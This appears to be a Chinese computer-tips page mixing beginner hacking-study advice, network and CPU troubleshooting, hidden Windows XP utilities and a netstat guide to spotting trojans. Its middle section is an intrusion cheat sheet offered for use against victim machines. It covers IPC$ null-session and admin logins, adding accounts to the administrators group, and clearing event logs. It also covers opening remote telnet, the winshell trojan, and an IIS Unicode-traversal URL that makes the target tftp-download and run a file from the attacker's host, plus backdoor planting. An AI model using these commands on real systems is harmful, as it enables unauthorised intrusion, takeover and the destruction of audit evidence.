精選欄目: 裝機必備 專題大全 常用工具 系統集錦

開始→運行→輸入的命令集錦

欄目: 電腦技巧 已有人學習|編輯:admin; 來源:未知;

一:寫在前面   
許多剛入門的菜鳥都在為找不到好的學習方法而苦惱,處處受到阻礙,不但使自己越來越沒有信心而且還耽誤了寶貴的學習時間
作了許多沒有用的事,到最后還是毫無收獲。
今天為大家總結一些我個人的學習方法還在網上整理了一些學習方法和必備的知識,希望能對讀者們幫助,讓菜鳥少走些彎路。

二:學習方法
1 利用搜索引擎
這是一種高效的學習方法,相信每個高手都從這里受益匪淺,這也是菜鳥最好的老師,她隨叫隨到,言聽即從,力量強大。強烈建議大家在遇到問題前,先請教一下www.Google.com

1)公共搜索引擎
比如大名鼎鼎的Google,還有百度等。利用這類搜索引擎,你幾乎可以搜到任何你想要的東西,比如:文章,教程,軟件,安全站點,安全論壇,一切的一切。
所以以后不要再問諸如3389是什么端口(去搜一下3389+空格+端口+空格+漏洞);流光在哪里下載(去搜流光+空格+工具+空格+下載);ipc$怎樣利用(去搜ipc$Content$空格+入侵+空格+教程)等完全可以向搜索引擎請教的問題,如果你非要問一下,沒關系,你會得到簡單明了的答案:‘去搜!!’請不要埋怨這位高手不耐心,面對千百個這樣的菜鳥問題,他這么做已經很人道了。
因此可以看出,掌握良好的學習技巧對菜鳥來說是多莫重要,不少菜鳥就是因為像這樣到處碰壁后,最終放棄了hack學習。
*不會利用搜索引擎對菜鳥來說是致命的,你將舉步為艱,反之,你將進步神速。

2)站點內部/論壇的搜索引擎
使用方法上大同小異,比如你現在需要一篇教程或是一個hack軟件,而你又覺得google上搜出來的東西太雜或覺得沒有專業性,那么這時候你就可以到各大安全站點或論壇上去搜索,比如紅客聯盟,小榕的論壇,當然還有我們的論壇www.nohack.cn/bbs,在這些站點的內部引擎里搜到的教程或軟件,一般都是比較有保證的。
*如果你是一只想飛的菜鳥,那么就學著去搜索吧。

2 閱讀書籍
hack學習中,書籍是必不可少的,這個我不用多少,只是希望大家能有選擇的購買書籍,找到最適合自己的那一種。

1)基礎知識類:一般來說菜鳥的基礎是比較差的,甚至一些基本常識都不知道,因此有幾本基礎知識的書作為參考是必不可少的,比如關于TCP/IP,網絡,操作系統,局域網等,甚至是關于DOS,windows基礎的書都是很有必要的。在讀書的過程中,你一定會遇到許多不懂的名字或術語,該怎么辦呢?白學了??去搜索吧!!
注意:此類書籍關鍵在于它的通俗易懂性,不要追求多莫深入,對菜鳥來說,急于求成是最要不得的。因為我還是學生,因此學校的圖書館是很好的書源(主要是免費),我幾乎借遍了所有hack方面書籍,如果你已經不是學生,建議你到各大圖書館去借,因為這樣要比買書不知省多少錢。
*菜鳥準備2-4本即可

2)大眾雜志類
此來書籍的精華在于它的合訂本,比如電腦報合訂本,電腦應用文萃合訂本等等,就相當于一個大百科,分類詳細,內容豐富,每年買上一兩本就足夠了,你會從中受益匪淺。
注意:此類書籍的優勢在于內容全面,各個方面都能涉及到,查找方便,但因其定位在大眾雜志,內容相對比較基礎,適合菜鳥做全方位了解。
*菜鳥準備1-2本即可

3)hack雜志類
比如《黑客手冊》和相關的雜志等,此類雜志專業性強,內容由淺入深,討論詳細,并附送光盤,對比較富裕的朋友來說是個不錯的選擇,當然,你也可以到網上找一些電子版,下載觀看。
注意:這是一種比較好的入門方法,許多朋友都是在無意中買了此類雜志后,才開始對hack技術感興趣的。
*菜鳥不定期購買即可,如果你經濟確實不富裕,可以放棄,或找電子版觀看


3 察看教程
教程大部分發布于網上,你可以到各大安全站點的文章系統中去找,或者去相關論壇或Google搜索。這是一種令人興奮的學習方法,一篇好的教程能讓你進步飛快,如果你能找到一些專業而又詳細的教程,你的hack學習將會事半功倍,因為教程比書籍讀起來更親切,而且語言通俗易懂,尋找方便(如果是書籍,那要買多少本啊),而且他最大的特點在于百家爭鳴,對于同一個問題可能有很多的教程,你可以一一觀看,從中總結出最精華的部分。
注意:由于任何人都可以發布教程(當然,好的安全站點是有驗證機制的),所以一些個別教程并不能保證其正確性,或者不能保證在任何情況下都具有正確性,因此在閱讀時要有所取舍。還有,一些老的教程其內容或所涉及軟件可能不再適用,請大家注意這點。
另外,現在比較流行動畫教程,這種教程的優點在于直觀,對菜鳥中的菜鳥幫助很大(許多菜鳥只看的懂動畫教程),但我個人更傾向于文字教程,原因:連文字教程都看不懂,還做什么hacker,看動畫教程只會讓你越來越懶,而不愿再去思考(個人觀點)。當然,有些文字教程寫得的確很爛,讀了以后讓人更暈。
*這是菜鳥必須掌握而且要會靈活運用的學習方法

4 在論壇上學習/交流
論壇是菜鳥成長必不可少的基石,如果你能找到一個管理嚴格,技術含量高,充滿活力的論壇,那么我真的要祝賀你,因為你將在這個論壇中學到許多許多東西。那么如何使用一個論壇呢?如下:
1)留意精華版:這是一個論壇的精華所在,所有一級棒的帖子幾乎都在這里了,慢慢的讀吧,你會收獲很多。
2)提問前先搜索:這是許多菜鳥忽略的問題,如果你不注意,將浪費你很多時間,原因是這樣的:菜鳥一般所提的問題就那么幾十個,在一個稍微老一些的論壇上基本上應該都有人提過了,而且是不止一次的提過了,因此你事先搜索一下,應該會搜到不止一篇的帖子,在這些帖子的回復中,應該有你想要的答案,但如果你不去搜索而直接提問,那么你將花費一定的時間去等待回復,這就是浪費,況且大部分高手都反感提問簡單而重復的問題,那么你得到的回復也許將更加粗略而潦草,這更是浪費。所以,在提問前懇請你,現搜索一下問題吧!!
3)關注高手的帖子:一個論壇上一定會有幾位高手,比如版主之類(至于怎么判定一個高手,就不用我多說了吧),他們的回復不但精彩,他們所發的帖子更值得關注,而這是大家常常忽略的問題,所以,在論壇上你可以試著搜一下這位高手的用戶名,那么他所有的帖子將展現在你面前,仔細看看吧,高手的帖子就是不一樣吧。
4)熱點的帖子:一般體現在回復率上,這類帖子并不一定是關于技術的,但他一定是人們現在最關心的(否則哪里會有那么多回復),多看看這類帖子,你將獲得更豐富的知識。
5)高效的提問:對于同樣的一個問題,不同的提問方式,將會受到不同的效果,能得到你最想要得答案,就是高效的提問。那么如何高效的提問呢?

(1)帖子標題寫清楚:像‘快來救我呀’‘誰知道為什么’‘高手請進’這類的帖子,我是很少光顧的,一個好的標題要能概括帖子的主要內容;
(2)內容盡量詳細:原因很簡單,連問題都說不清楚,誰會幫你,誰能幫你(神仙??);要說明問題出現的環境,不同的環境會有不同的結果;
(3)提問前作最大的努力:請確認你在提問前已經盡了最大努力,但還是沒有效果。如果你打算提一些懶人的問題,比如‘我找不到流光的下載,請高手發到我的郵箱好嗎’‘誰會net命令呀,教我’,那么所有人將會鄙視你,很難想象懶漢當了hacker會是什么樣子;
(4)感謝幫助你的人:這是最起碼的作人禮儀。

6)融入論壇:在你的能力范圍內,給予他人最大的幫助。
*論壇對菜鳥就像空氣一樣重要,去找一個適合你的論壇吧。

5 與高手直接交流
這也許是最最高效的學習方法了,能與高手直接交流是一件多么美妙的事情阿,但如果使用不當,也會給自己和對方帶來許多不快。
1)如果你與這位高手認識甚至是好朋友,那問題很好辦,盡情的提問吧,只要不是很過分就行;
2)如果你與這位高手素昧平生,那還是謹慎一點,不要一股腦提許多問題,因為大家得時間都是寶貴的,他不可能花許多時間來專為你一個人服務,因此建議你慢慢來,每次提1-2個問題就好,因為還有下次嘛!
3)不要輕易打擾別人,以下方式請慎用:oicq,mail,homephone,
4)要尊重對方,不要過于奢求,在這個功利的社會,要學會被拒絕,再說人家也沒有義務必需要給你解答問題。
*能得到高手的幫助當然最好,如果沒有路子,也不要強求,相信你自己也能行。

三 具體切入點

寫到這里了,一些菜鳥說仍然找不到切入點,不知道該從何入手,說哪里都不明白,看什么都看不懂,無法入門。也難怪,菜鳥嘛,的確很難入手,有些朋友就是因為前期的學習很吃力才放棄了的,那么好,我就繼續介紹我本人的兩個方法吧。

1基礎書籍法:既然基礎差,那么就從基礎開始,去買一至兩本hack方面的既基礎又全面的書籍來看,比如《黑客就這么幾招》等等,此類書籍比較基礎,但又很全面,黑客初期的基本攻擊方法都有介紹,以此類書為基礎慢慢的學習,過一段時間你會發現你已經入門了;

2教程解惑法:就是說一旦遇到不明白的地方就通過搜索引擎,資料,教程來解答,在求解的過程中,你一定還會關聯的遇到其他不懂的新問題,那么好,繼續找資料看教程,就這樣一直連續不斷,遇到不懂的就去看,不管他是哪方面的,慢慢的,你所懂的會越來越多,你會發現你已經入門了。此類方法有很大的隨意性,不是很系統,但靈活自由,高效;

3結合法:就是將以上兩種方法結合,這是很好的一種方法,建議大家使用。

四 總結

以上基本上是我個人的一面之談,難免主觀一些,請海涵。如果你還有什么好的學習方法,請一定要告訴我,我會收入到這片帖子當中,希望她能對菜鳥們有所幫助。


網絡必備知識

(一).網卡安裝故障檢查方法
  如果無法安裝網卡驅動程序或安裝網卡后無法登錄網絡,請按下述步驟檢查處理:

  1.選擇“控制面板”/“系統”圖標,打開“系統屬性”窗口;

  2.在“系統屬性”窗口的“設備管理”標簽的“按類型查看設備列表”中,雙擊“網絡適配器”條目前的“+”號將其展開,其下應當列出當前網卡;

  3.如果“設備管理”標簽中沒有“網絡適配器”條目或當前網卡前有一“X”號,說明系統沒能識別網卡,可能產生的原因有網卡驅動程序安裝不當、網卡硬件安裝不當、網卡硬件故障等等;

  4.如果網卡前有一帶圓圈的“!”,說明系統找到了網卡,但網卡不能正常工作,請選定網卡后按“屬性”按鈕,打開“網卡屬性”單;

  5.如果網卡不能正常工作,在“網卡屬性”窗口“常規”標簽的“設備狀態”欄目中會給出故障類型和推薦的解決方法;如果存在資源沖突,在“資源”標簽中的“沖突設備列表”中通常會給出與網卡發生沖突的設備以及沖突的IRQ中斷號或I/O地址。對有些PCI網卡,用上述方法無法檢查到資源沖突,可選擇“開始”/“程序”/“附件”/“系統工具”/“系統信息”打開“Microsoft系統信息”窗口,雙擊左邊窗口“系統信息”框中“硬件資源”條目前的“+”號將其展開后,能檢查到資源沖突。

(二).網卡設置資源沖突處理方法

  網卡非常容易與其它設備發生資源沖突,尤其是在系統中安裝有多只接口卡的情況下,資源沖突常采用以下幾種方法處理。

  方法一:在上述“網卡屬性”窗口“資源”標簽的“資源類型”列表中選定發生沖突的“資源”,按“更改設置”按鈕,更改發生沖突的IRQ中斷號或I/O地址;

  方法二:早期網卡常強行占用IRQ3,與COM2發生IRQ中斷沖突,如果用戶不使用COM2,可在BIOS中將“Onboard UART Port”項設置為Disabled,關閉COM2;

  方法三:有些PCI網卡會強行占用IRQ10,與一些強行占用IRQ10的顯示卡發生IRQ中斷沖突,可在BIOS中將“Assign IRQ For VGA”項設置為Disabled,不給顯示卡分配固定的中斷;

  方法四:運行網卡程序軟盤中的設置程序,將網卡設置為非PNP模式(jumpless),設置IRQ中斷號和I/O地址為系統未占用的地址;并在BIOS中將相應中斷號由PCI/ISA改為Legacy ISA;

  方法五:升級網卡BIOS,這種方法要求網卡使用的是Flash ROM,還需要去相應網站下截高版本網卡BIOS更新程序。如果用戶采用上述方法均不能解決故障,建議您換一塊網卡試試。

(三)在“網上鄰居”中除了“整個網絡”,什么也沒有,點擊“整個網絡”,告訴你無法瀏覽。

   查找以下各項:

  a.是否正確安裝IPX/SPX協議,協議是否與網卡綁定。至于NetBEUI,我認為對于用Hub連起來的網,裝不裝不大重要。

  b.是否正確安裝“Microsoft 網絡客戶”。

  c.要至少看到自己,應安裝“文件與打印機共享”。

  d.有固定IP的(前提是TCP/IP協議已裝),保證網內所有機子的IP前三段相同,子網掩碼為255.255.255.0。沒有的,使工作組名字相同。

  e.啟動時問你網絡登陸用戶和密碼時最好不要按“Esc”。

  f.五類線的問題,有條件的用查線器查一下,沒條件的換一條線,或換一個Hub口看一下。

  g.98內部的問題,如果所有設置都和別人一樣,網線插到別人的機子上也能用,就要考慮重裝系統了

CPU占用100%解決辦法

一般情況下cpu占了100%的話我們的電腦總會慢下來,而很多時候我們是可以通過做一點點的改動就可以解決,而不必問那些大蝦了。

當機器慢下來的時候,首先我們想到的當然是任務管理器了,看看到底是哪個程序占了較搞的比例,如果是某個大程序那還可以原諒,在關閉該程序后只要cpu正常了那就沒問題;如果不是,那你就要看看是什么程序了,當你查不出這個進程是什么的時候就去google或者baidu搜。有時只結束是沒用的,在xp下我們可以結合msconfig里的啟動項,把一些不用的項給關掉。在2000下可以去下個winpatrol來用。
一些常用的軟件,比如瀏覽器占用了很搞的cpu,那么就要升級該軟件或者干脆用別的同類軟件代替,有時軟件和系統會有點不兼容,當然我們可以試下xp系統下給我們的那個兼容項,右鍵點該.exe文件選兼容性。

svchost.exe有時是比較頭痛的,當你看到你的某個svchost.exe占用很大cpu時你可以去下個aports或者fport來檢查其對應的程序路徑,也就是什么東西在掉用這個svchost.exe,如果不是c:windowssystem32(xp)或c:winntsystem32(2000)下的,那就可疑。升級殺毒軟件殺毒吧。

右擊文件導致100%的cpu占用我們也會遇到,有時點右鍵停頓可能就是這個問題了。官方的解釋:先點左鍵選中,再右鍵(不是很理解)。非官方:通過在桌面點右鍵-屬性-外觀-效果,取消”為菜單和工具提示使用下列過度效果(U)“來解決。還有某些殺毒軟件對文件的監控也會有所影響,可以關閉殺毒軟件的文件監控;還有就是對網頁,插件,郵件的監控也是同樣的道理。

一些驅動程序有時也可能出現這樣的現象,最好是選擇微軟認證的或者是官方發布的驅動來裝,有時可以適當的升級驅動,不過記得最新的不是最好的。

cpu降溫軟件,由于軟件在運行時會利用所以的cpu空閑時間來進行降溫,但windows不能分辨普通的cpu占用和降溫軟件的降溫指令之間的區別,因此cpu始終顯示100%,這個就不必擔心了,不影響正常的系統運行。

在處理較大的word文件時由于word的拼寫和語法檢查會使得cpu累,只要打開word的工具-選項-拼寫和語法把”檢查拼寫和檢查語法“勾去掉。

單擊avi視頻文件后cpu占用率高是因為系統要先掃描該文件,并檢查文件所有部分,并建立索引;解決辦法:右擊保存視頻文件的文件夾-屬性-常規-高級,去掉為了快速搜索,允許索引服務編制該文件夾的索引的勾。

隱藏在XP的28個秘密武器

Windows XP現在大家都在用了,不過,隱藏在它其中的秘密武器可不是人人都找得到,下面就讓我帶大家來尋找Win XP中的28個秘密武器。

1、免費的系統教程(system32文件夾下)
安裝完windows xp后很想馬上學習并體驗一下它的魅力嗎?我們無需再東奔西走去找煩人的文字教材。只要選擇“開始”→“ 漫游windows xp”,就會出現界面,它將引導我們游歷windows xp的新功能。
  
小提示:windows xp中自帶的教程非常形象,是圖形界面的,而且制作得相當精美,微軟的權威性可想而知。如果你的“開始”菜單上沒有“漫游windows xp”項目,則可以運行c:\windows\system32\tourstart.exe進入。

2、輔助功能向導——Accwiz(system32文件夾下)
我們知道,微軟在windows中為殘疾人士提供了輔助功能,使他們也能xx作計算機。該程序可以根據用戶的視覺、聽力和行動來配置我們的windows,使殘疾人士能根據自身情況更好地使用windows。
  
3、字符映射表——Charmap(system32文件夾)
是不是覺得word的“插入符號”功能非常方便?我們在其他windows程序中也常常要插入一些特殊符號,而一個個地找又麻煩,這時可使用“字符映射表”程序幫忙。通過“字符映射表”可查看選定字體中有哪些字符,選中后單擊“選定”和“復制”按鈕,即可把選定字符復制到windows剪貼板中,供字處理軟件粘貼使用。
  
小提示:用它來復制特殊字體中的特殊符號特別有用。

4、倉頡拼音輸入法——Cintsetp(system32\ime\cintlgnt文件夾下)
微軟新倉頡輸入法98b的安裝程序,微軟把它放在簡體中文版windows xp中,但埋藏得較深。不過它很有用,安裝后就會在windows中新增一個“中文(臺灣)”的倉頡輸入法,利用它可以在簡體中文windows xp上通過輸入繁體漢字。這對于從中國港澳臺地區至內地工作的人提供了方便。

5、磁盤清理大師——Cleanmgr(system32文件夾下)
盡管現在的硬盤越來越大,但它總有容量的限制。在你不經意地安裝這個或那個軟件的過程中,可能會因為硬盤空間已頻頻告急而影響了正常windows程序的執行。不要急,請打開此程序,它會自動地釋放出一部分硬盤空間,并會智能化地進行刪除xx作,保證你的系統萬無一失。這比從資源管理器中刪除要安全多了。
  
6、剪貼板查看器——Clipbrd(system32文件夾下)
windows剪貼板為我們在各個windows程序間的信息交流提供了一個橋梁。但這部分數據一般情況下無法看到。不過,使用剪貼板查看器就可看到當前剪貼板中的“新大陸”。windows xp中的剪貼板查看器程序較原先windows 9x/me的舊版本多出了共享功能,通過設置權限允許其他網上用戶將該剪貼板裝入使用。

7、控制面板啟動器——Control.exe(system32文件夾下)
控制面板是windows的一個重要組成部分,許多設置都通過他完成。而雙擊這個文件就是最快打開系統控制面板的方法,可省去從“開始”菜單上層層點擊的麻煩。
  
8、Windows xp的診斷醫生——Drwtsn32(system32文件夾下)
drwtsn32是一個程序錯誤調試器。drwatson程序會獲得并記錄運行windows的計算機上的程序錯誤的信息。只要檢測到錯誤,就會創建一個文本文件drwtsn32.log),提供錯誤原因的詳細說明,并給出解決問題的建議性xx作,在與microsoft技術支持聯系并請求幫助時,drwatson將會起到很大作用。

9、DVD播放器——Dvdplay(system32文件夾下)
隨著dvd驅動器和dvd光盤價格的下降,在普通家庭電腦上配置一個dvd播放器已不是一件奢侈的事情。而要播放dvd需要播放器的支持,windows xp提供了一個“免費”的dvd播放器,有了它我們可以省去一筆購買第三方dvd播放軟件的費用。

10、自解壓文件制作工具——Iexpress(system32文件夾下)
用過壓縮軟件的讀者一定對自解壓文件不陌生,自解壓文件可在沒有相應解壓縮程序的情況下直接將壓縮包文件解壓縮到相應的文件夾下,極大地方便了用戶。利用iexpress可制作兩種自解壓文件,一種是標準自解壓文件(standard
self-extractor),另一種是安裝程序式自解壓文件(self-extractor for
software installation),這樣我們在發布程序時就方便多了。另外大家要注意,盡管使用iexpress的運行界面是英文的,但利用它生成的自解壓文件卻是中文的,省去了繁瑣的本地化工作。
  
11、文件轉移向導——Migwiz(system32\usmt文件夾下)
windows系統的易用性總是和不穩定性共存的,因此在系統健康之時把當前設置保存下來,供系統崩潰后重新安裝時使用是個不錯的主意。微軟已把這個工具集成到“文件和設置轉移向導”程序上。通過它,我們就可以實現系統狀態的備份與恢復。
  
12、系統配置程序——Msconfig(windows\pchealth\helpctr\binaries文件夾下)和windows中的系統配置程序一樣,通過這個程序,我們可對系統的一般、system.ini、win.ini、boot.ini、服務和啟動項目進行修改。
  
小提示:用它來去除系統自啟動程序特別有效。

13、備份工具——Ntbackup(system32文件夾下)
數據是計算機中最為寶貴的資料,因此經常備份你的資料也應該成為一個好習慣。現在許多人都尋求第三方的備份工具,其實大可不必。使用windows xp中內置的備份工具就可以非常方便地將資料進行備份,而且由于你使用的是微軟產品,所以根本不存在兼容性問題。
 
14、ODBC數據源管理器——Odbcad32(system32文件夾下)
在windows中訪問odbc數據源必須要有其驅動程序,該工具可以查看在windows中已安裝的驅動程序及相關信息。

15、對象包裝程序——Packager(system32文件夾下)
通過對象包裝程序我們可以打開一個文件,并引入其中的圖標,將它們插入到一般windows程序中使用,可用于制作計算機類教學課件或文檔。
  
16、注冊表編輯器增強版——Regedit32(system32文件夾下)
注冊表編輯器是用來更改系統注冊表設置的高級工具。注冊表中包含了有關計算機如何運行的信息。在windows xp中有一個名為regedit的程序,可編輯注冊表,但此程序卻是它的增強版本,除可編輯注冊表外,還可設置權限、清除重復項、刪除已被卸載或刪除的程序項等高級xx作。
  
17、Activex注冊和反注冊工具——Regsvr32
使用過activex的人都知道,activex不注冊是不能夠被系統識別和使用的,一般安裝程序都會自動地把它所使用的activex控件注冊,但如果你拿到的一個控件需要手動注冊怎么辦呢?如果修改注冊表那就太麻煩了,在windows的system文件夾下有一個regsvr32.exe的程序,它就是windows自帶的activex注冊和反注冊工具。它的用法為:“regsvr32 [/n] [/i(:cmdline)] dllname”。其中dllname為activex控件文件名,建議在安裝前拷貝到system文件夾下。

參數有如下意義:
/u——反注冊控件
/s——不管注冊成功與否,均不顯示提示框
/c——控制臺輸出
/i——跳過控件的選項進行安裝(與注冊不同)
/n——不注冊控件,此選項必須與/i選項一起使用
如筆者要注冊一amovie.ocx控件,則打入regsvr32 amovie.ocx即可,要反注冊它時只需使用regsvr32 /u amovie.ocx就行了。

18、動態鏈接庫函數啟動器——Rundll32
在windows中使用了許多動態鏈接庫,這樣就使得所有windows程序都可共享這些動態鏈接庫中的函數。一般情況下,許多應用程序都通過windows api來xx作這些函數,但歸根結底是通過windows文件夾下的rundll32.exe程序來啟動相應的函數。它的用法是:“rundll32.exe 動態鏈接庫名,函數名,參數名”。如筆者需要實現一鍵關機,則在桌面上建立一快捷方式,命令行為“rundll32.exe user.exe,exitwindows”,并設置其快捷鍵為f4即可。再如,筆者要打開控制面板,則只需要輸入命令“rundll32.exe shell32.dll,control_rundll”即可,要打開桌面屬性,只需要使用“rundll32.exe shell32.dll,control_rundll desk.cpl”,其余的以此類推。

19、系統文件檢查器——Sfc(system32文件夾下)
使用windows難免不會出現系統文件損壞或丟失的毛病,而如果為了幾個小小的文件就去重裝系統,又顯得稍微麻煩了一些。通過系統文件檢查器sfc.exe,一切都會變得非常簡單。
  
20、共享文件夾設置工具——Shrpubw(system32文件夾下)
同一工作組的同事在一起工作,有時必須與同事們共享文件夾,這時我們可以利用此工具輕松搞定。它的作用與右擊一文件夾,選擇“共享”基本上等價。
  
21、Microsoft 簽字驗證工具——Sigverif(system32文件夾下)
所謂“簽署的文件”,就是被授予microsoft數字簽署的文件。該簽署表明,該文件是原始文件的一模一樣的副本。通過microsoft簽字驗證工具,我們可在計算機上查找已簽署和未簽署的文件,也可查看簽署文件的身份驗證,以確認該文件還沒有被篡改。使用起來非常方便,和查找窗口幾乎沒有什么不同,只要給出搜索范圍,就可搜索出指定范圍內的已簽署文件和未簽署文件。

22音量控制程序——Sndvol32
我們在windows任務欄上可見到一個可愛的小喇叭,當我們雙擊它時就會彈出音量控制面板,其實這時我們就是啟動了一個windows文件夾下的sndvol32.exe文件。不信,請你進入windows文件夾,再打開sndvol32.exe文件看看,熟悉的“音量控制”面板是否已經在你眼前了?另外還要告訴大家,它還有一個隱藏的參數“/r”,利用此參數可快速地打開錄音控制面板,這樣我們只要在桌面上建立一指向c:\windows\sndvol32.exe的快捷方式,并令它的參數為/r(即在目標中填入“c:\windows\sndvol32.exe /r”),就可以快速打開錄音控制面板選擇輸入設備了。如果設備過多,在面板上容納不下時,試著按“ctrl+s”鍵,不管有多少設備都能夠完全顯示。

23、任務管理器——Taskmgr(system32文件夾下)
任務管理器提供正在你的計算機上運行的程序和進程的相關信息,使用任務管理器可快速查看正在運行的程序的狀態,或終止已停止響應的程序。也可使用多達15個的參數評估正在運行的進程的活動,以及查看cpu和內存使用情況的圖形和數據。當計算機發生鎖死時使用它最方便和有效。

24、遠程連接程序——Telnet(system32文件夾下)
在internet上有無數的計算機,而要訪問它們都必須通過建立遠程連接才行,進行兩個計算機的遠程連接可用專門軟件實現,但通過windows自帶的遠程連接程序telnet.exe也能完成這一xx作,而且它還是純中文界面軟件。

25、遠程FTP工具——Tftp(system32文件夾下)
ftp是一個網絡傳輸的協議,通過這個程序可非常方便地連接到對方的服務器上進行文件的存取xx作,省得再找如第三方的ftp軟件了,可惜的是它是字符界面。
  
26、Windows升級程序——Wupdmgr(system32文件夾下)
安裝完windows后,在開始菜單的上方會有windows update菜單項,通過它能自動登錄到microsoft公司的網站上完成自己windows的升級工作。但時間一長,可能會把這個快捷方式誤刪除了,這時我們就可以通過打開windows下的wupdmgr.exe文件來完成這個功能。
  
Windows xp實為一個功能強大的*作系統,但只有充分地發揮其內置功能,才能更好地使用它。這也符合“基礎的未必是最壞的,回到基礎還是好的”的道理

菜鳥常用命令

(與遠程主機建立空管連接) net use ip地址ipc$ "" /use:""
(以管理員身份登錄遠程主機) net use ip地址ipc$ "密碼" /use:"administrator"
(傳送文件到遠程主機winnt目錄下)copy 本機目錄路徑程序 ip地址admin$
(查看遠程主機時間) net time ip地址
(定時啟動某個程序) at ip地址 02:18 readme.exe
(查看共享) net view ip地址
(查看netbios工作組列表) nbtstat -a ip地址
(將遠程主機c盤映射為自己的f盤) net use f: ip地址c$ ""/user:"administrator"
(這兩條把自己增加到管理員組): net user 用戶名 密碼 /add
net localgroup administrators 用戶名 /add
(斷開連接) net use ip地址ipc$ /delete
del c:winntsystem32logfiles*.*
del c:winntssytem32config*.evt
del c:winntsystem32dtclog*.*
del c:winntsystem32*.log
del c:winntsystem32*.txt
del c:winnt*.txt
del c:winnt*.log

一、netsvc.exe
下面的命令分別是列出主機上的服務項目、查尋和遠程啟動主機的“時間任務”服務:
netsvc /list ip地址
netsvc schedule ip地址 /query
netsvc ip地址 schedule /start

二、opentelnet.exe
遠程啟動主機的telnet服務,并綁定端口到7878,例如:
opentelnet ip地址 用戶名 密碼 1 7878
然后就可以telnet到主機的7878端口,進入dos方式下:
telnet ip地址 7878

三、winshell.exe
一個非常小的木馬(不到6k),telnet到主機的7878端口,輸入密碼winshell,當看到cmd>后,可打下面的命令:
p path (查看winshell主程序的路徑信息)
b reboot (重新啟動機器)
d shutdown (關閉機器)
s shell (執行后你就會看到可愛的“c:>”)
x exit (退出本次登錄會話,此命令并不終止winshell的運行)
cmd> http://.../srv.exe (通過http下載其他網站上的文件到運行winshell的機器上)

四、3389登陸器,gui方式登錄遠程主機的

五、elsave.exe
事件日志清除工具
elsave -s ip地址 -l "application" -c
elsave -s ip地址 -l "system" -c
elsave -s ip地址 -l "security" -c
執行后成功清除應用程序日志,系統日志,安全日志

六、hbulot.exe
開啟win2kserver和winxp的3389服務
hbulot [/r]
使用/r表示安裝完成后自動重起目標使設置生效。

七、nc.exe(netcat.exe)
一個很好的工具,一些腳本程序都要用到它,也可做溢出后的連接用。
想要連接到某處: nc [-options] hostname port [ports] ...
綁定端口等待連接: nc -l -p port [-options] [hostname] [port]

參數:-e prog 程序重定向,一旦連接,就執行 [危險!!]
-g gateway source-routing hop point, up to 8
-g num source-routing pointer: 4, 8, 12, ...
-h 幫助信息
-i secs 延時的間隔
-l 監聽模式,用于入站連接
-n 指定數字的ip地址,不能用hostname
-o file 記錄16進制的傳輸
-p port 本地端口號
-r 任意指定本地及遠程端口
-s addr 本地源地址
-u udp模式
-v 詳細輸出——用兩個-v可得到更詳細的內容
-w secs timeout的時間
-z 將輸入輸出關掉——用于掃描時

八、tftpd32.exe
把自己的電腦臨時變為一臺ftp服務器,讓肉雞來下載文件,tftp命令要在肉雞上執行,通常要利用unicode漏洞或telnet到肉雞,例如:
http://ip地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本機ip地址 get 文件名 c:winntsystem32文件名
然后可以直接令文件運行:
http://ip地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名

九、prihack.exe是iis的printer遠程緩沖區溢出工具
idqover.exe是溢出idq的,選擇“溢出后在一個端口監聽”,然后用telnet連接它的監聽端口,如果溢出成功,一連它的端口,綁定的命令馬上執行。xploit.exe是一個圖形界面的ida溢出,成功以后winxp下需要打winxp。
ntis.exe、cmd.exe和cmdasp.asp是三個cgi-backdoor,exe要放到cgi-bin目錄下,asp放到有asp執行權限的目錄。然后用ie瀏覽器連接。

十、弱口令
在nt2000xp2003中弱口令可以用
Net use ip “password” /user:user
如果目標機開3389服務,可以直接連接
在sql的sa弱口令可以用sql連接器直接 ·登陸

后門木馬
如果有ipc$共享,可以copy過去木馬后門
用at啟動
AT ip time /INTERACTIVE
如果可以得到shell,也可以用tftp
Tftp.exe ?Ci ip get *.* *.*
然后直接安裝 ·如果有3389,可以自己建一個iis,下載 直接運行

        


管理特殊端口——防范木馬攻擊.
木馬是一種帶有惡意性質的遠程控制軟件,木馬一般分為客戶端(Client)和服務器端(Server),客戶端就是本地使用的各種命令的控制臺,服務器端則是給別人運行,只有運行過服務器端的計算機才能夠完全受控。

  當前最為常見的木馬通常是基于TCP/UDP協議進行client端與server端之間的通訊的,既然利用到這兩個協議,就不可避免要在server端(就是被種了木馬的機器了)打開監聽端口來等待連接。例如鼎鼎大名的冰河使用的監聽端口是7626,Back Orifice 2000則是使用54320等等。那么,我們可以利用查看本機開放端口的方法來檢查自己是否被種了木馬或其它hacker程序。以下是詳細方法介紹。

  Windows本身自帶的netstat命令

  Netstat顯示協議統計和當前的 TCP/IP 網絡連接。該命令只有在安裝了 TCP/IP 協議后才可以使用。

  netstat [-a] [-e] [-n] [-s] [-p protocol] [-r] [interval]

  參數

  -a 顯示所有連接和偵聽端口。服務器連接通常不顯示。

  -e 顯示以太網統計。該參數可以與 -s 選項結合使用。

  -n 以數字格式顯示地址和端口號(而不是嘗試查找名稱)。

  -s 顯示每個協議的統計。默認情況下,顯示 TCP、UDP、ICMP 和 IP 的統計。-p 選項可以用來指定默認的子集。

  -p protocol 顯示由 protocol 指定的協議的連接;protocol 可以是 tcp 或 udp。如果與 -s 選項一同使用顯示每個協議的統計,protocol 可以是 tcp、udp、icmp 或 ip。

  -r 顯示路由表的內容。

  interval 重新顯示所選的統計,在每次顯示之間暫停 interval 秒。按 CTRL+B 停止重新顯示統計。如果省略該參數,netstat 將打印一次當前的配置信息。

  現在,我們掌握netstat命令的使用方法了,下面就讓我們現學現用,用這個命令看一下自己的機器開放的端口。進入到命令行下,使用netstat命令的a和n兩個參數:

  C:netstat -a -n

  Active Connections

  Proto Local ADDRess Foreign Address State

    TCP 0.0.0.0:80 0.0.0.0:0 LISTENING

    TCP 0.0.0.0:21 0.0.0.0:0 LISTENING

    TCP 0.0.0.0:7626 0.0.0.0:0 LISTENING

    UDP 0.0.0.0:445 0.0.0.0:0

    UDP 0.0.0.0:1046 0.0.0.0:0

    UDP 0.0.0.0:1047 0.0.0.0:0

